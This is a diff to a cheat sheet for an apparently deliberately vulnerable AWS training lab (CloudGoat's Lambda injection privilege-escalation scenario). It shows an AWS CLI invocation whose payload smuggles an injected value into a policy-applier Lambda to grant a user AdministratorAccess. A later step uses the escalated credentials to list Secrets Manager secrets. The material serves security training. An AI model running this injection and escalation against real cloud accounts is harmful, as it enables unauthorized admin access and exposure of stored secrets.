RhinoSecurityLabs/cloudgoat/scenarios/lambda_injection_privesc/cheat_sheet.md

     ```bash
     aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}' out.txt
     ```
-6. Now that Bilbo is an admin, use credentials for that user to invoke the target lambda.
+6. Now that Bilbo is an admin, use credentials for that user to list secrets from secretsmanager.

     ```bash
-    # This command invokes the target lambda
+    # This command will list all the secrets in secretsmanager
-    aws --profile bilbo --region us-east-1 lambda invoke --function-name cg-lambda_injection_privesc_cgid05fabeanxc-target_lambda output.txt
+    aws --profile bilbo --region us-east-1 secretsmanager list-secrets
-    # This reads the response from the lambda
-    cat output.txt
     ```

-# place secret in secrets manager and read it out